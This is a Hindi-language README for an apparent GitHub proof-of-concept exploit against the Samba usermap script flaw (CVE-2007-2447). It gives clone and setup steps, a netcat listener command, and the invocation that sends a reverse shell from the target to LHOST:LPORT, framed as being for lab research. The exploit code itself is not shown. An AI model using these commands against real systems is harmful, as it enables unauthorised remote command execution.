
Samba usermap स्क्रिप्ट रिमोट कमांड निष्पादन (CVE-2007-2447) के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, नियंत्रित प्रयोगशाला परीक्षण और सुरक्षा अनुसंधान के लिए रिवर्स शेल क्षमता के साथ।
PoC: Samba "usermap script" दूरस्थ कमांड-निष्पादन (ऐतिहासिक CVE). इस रिपॉजिटरी में एक छोटा प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट है जो अनुसंधान और शैक्षिक समीक्षा के लिए है। प्राथमिक स्क्रिप्ट usermap_script_Command_Execution.py है।
संदर्भ लेख: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
रिपॉजिटरी को क्लोन करें और स्क्रिप्ट को एक नियंत्रित प्रयोगशाला में चलाएं। PoC वैकल्पिक रूप से LHOST:LPORT पर एक रिवर्स शेल भेजता है — स्क्रिप्ट चलाने से पहले अपना लिसनर शुरू करें और सुनिश्चित करें कि निर्भरताएँ स्थापित हैं (स्थापना अनुभाग देखें)।
git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>
पैरामीटर
RHOST — लक्ष्य IP या होस्टनामRPORT — लक्ष्य TCP पोर्ट (आमतौर पर 139)LHOST — रिवर्स कनेक्शन के लिए लिसनर IPLPORT — लिसनर पोर्टअनुशंसित: स्क्रिप्ट चलाने से पहले एक पृथक Python वर्चुअल वातावरण बनाएं और requirements.txt से निर्भरताएँ स्थापित करें।
python3 -m venv exploit_env
source exploit_env/bin/activate
pip install -r requirements.txt
यह कोड केवल वैध सुरक्षा अनुसंधान, शिक्षा और रक्षात्मक परीक्षण के लिए प्रदान किया गया है। इस स्क्रिप्ट को किसी भी ऐसे सिस्टम के विरुद्ध न चलाएं जिसके आप मालिक नहीं हैं या जिसके लिए आपके पास स्पष्ट लिखित अनुमति नहीं है। दुरुपयोग कानूनी परिणामों का कारण बन सकता है; रिपॉजिटरी स्वामी दुरुपयोग के लिए उत्तरदायी नहीं है।
संभावित खतरनाक कोड का विश्लेषण करते समय हमेशा स्थैतिक कोड समीक्षा और नियंत्रित प्रयोगशाला परीक्षण (VM स्नैपशॉट, पृथक नेटवर्क और पैकेट कैप्चर) को प्राथमिकता दें।
यदि आप एक निष्पादन योग्य नहीं, बल्कि एनोटेटेड वॉकथ्रू या requirements.txt चाहते हैं, तो यहाँ एक issue खोलें या इसका अनुरोध करें।